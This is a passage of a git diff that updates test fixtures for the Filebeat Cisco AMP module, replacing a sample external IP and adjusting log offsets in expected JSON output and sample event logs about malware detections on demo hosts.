 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1963,7 +1963,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 40652,
+ "log.offset": 40802,
 "related.hash": [
 "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
 "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -1974,7 +1974,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -1990,7 +1990,7 @@
 "@timestamp": "2021-01-15T10:14:55.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2028,7 +2028,7 @@
 "host.hostname": "Demo_AMP_Threat_Audit",
 "host.name": "Demo_AMP_Threat_Audit",
 "input.type": "log",
- "log.offset": 41978,
+ "log.offset": 42133,
 "related.hash": [
 "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
 "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2039,7 +2039,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -2055,7 +2055,7 @@
 "@timestamp": "2021-01-15T10:14:55.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2095,7 +2095,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 43297,
+ "log.offset": 43457,
 "related.hash": [
 "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
 "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2106,7 +2106,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -2122,7 +2122,7 @@
 "@timestamp": "2021-01-15T10:13:54.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2162,7 +2162,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 44622,
+ "log.offset": 44787,
 "related.hash": [
 "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
 "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2173,7 +2173,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -2189,7 +2189,7 @@
 "@timestamp": "2021-01-15T10:13:54.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2227,7 +2227,7 @@
 "host.hostname": "Demo_AMP_Threat_Audit",
 "host.name": "Demo_AMP_Threat_Audit",
 "input.type": "log",
- "log.offset": 45948,
+ "log.offset": 46118,
 "related.hash": [
 "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
 "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2238,7 +2238,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -2254,7 +2254,7 @@
 "@timestamp": "2021-01-15T10:13:54.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2294,7 +2294,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 47266,
+ "log.offset": 47441,
 "related.hash": [
 "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
 "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2305,7 +2305,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -2321,7 +2321,7 @@
 "@timestamp": "2021-01-15T10:13:53.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2359,7 +2359,7 @@
 "host.hostname": "Demo_Dyre",
 "host.name": "Demo_Dyre",
 "input.type": "log",
- "log.offset": 48591,
+ "log.offset": 48771,
 "related.hash": [
 "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
 "e9d8c15e7d18678dd41771f72ed6693c",
@@ -2370,7 +2370,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -2382,7 +2382,7 @@
 "@timestamp": "2021-01-15T10:13:53.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2420,7 +2420,7 @@
 "host.hostname": "Demo_AMP_Threat_Audit",
 "host.name": "Demo_AMP_Threat_Audit",
 "input.type": "log",
- "log.offset": 49910,
+ "log.offset": 50095,
 "related.hash": [
 "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
 "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2431,7 +2431,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -2447,7 +2447,7 @@
 "@timestamp": "2021-01-15T10:13:41.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2485,7 +2485,7 @@
 "host.hostname": "Demo_Dyre",
 "host.name": "Demo_Dyre",
 "input.type": "log",
- "log.offset": 51229,
+ "log.offset": 51419,
 "related.hash": [
 "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
 "e9d8c15e7d18678dd41771f72ed6693c",
@@ -2496,7 +2496,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -2508,7 +2508,7 @@
 "@timestamp": "2021-01-15T10:13:29.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2546,7 +2546,7 @@
 "host.hostname": "Demo_Dyre",
 "host.name": "Demo_Dyre",
 "input.type": "log",
- "log.offset": 52548,
+ "log.offset": 52743,
 "related.hash": [
 "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
 "e9d8c15e7d18678dd41771f72ed6693c",
@@ -2557,7 +2557,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -2569,7 +2569,7 @@
 "@timestamp": "2021-01-15T10:13:17.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2607,7 +2607,7 @@
 "host.hostname": "Demo_Dyre",
 "host.name": "Demo_Dyre",
 "input.type": "log",
- "log.offset": 53867,
+ "log.offset": 54067,
 "related.hash": [
 "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
 "e9d8c15e7d18678dd41771f72ed6693c",
@@ -2618,7 +2618,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -2630,7 +2630,7 @@
 "@timestamp": "2021-01-15T10:12:53.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2670,7 +2670,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 55186,
+ "log.offset": 55391,
 "related.hash": [
 "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
 "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2681,7 +2681,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -2697,7 +2697,7 @@
 "@timestamp": "2021-01-15T10:12:53.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2735,7 +2735,7 @@
 "host.hostname": "Demo_AMP_Threat_Audit",
 "host.name": "Demo_AMP_Threat_Audit",
 "input.type": "log",
- "log.offset": 56512,
+ "log.offset": 56722,
 "related.hash": [
 "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
 "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2746,7 +2746,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -2762,7 +2762,7 @@
 "@timestamp": "2021-01-15T10:12:53.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2802,7 +2802,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 57830,
+ "log.offset": 58045,
 "related.hash": [
 "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
 "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2813,7 +2813,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log
index f31bf18a23a1..b643caa475b8 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log
@@ -1,100 +1,100 @@ -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":295927133,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.6A37D750F0-100.SBX.TG","detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14930696955218,"timestamp":1610656706,"timestamp_nanoseconds":844899579,"date":"2021-01-14T20:38:26+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.E4FCCBFA69-95.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610656706,"start_date":"2021-01-14T20:38:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":7120,"disposition":"Malicious","file_name":"QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":572000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":4788,"disposition":"Malicious","file_name":"28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":478000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526294","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 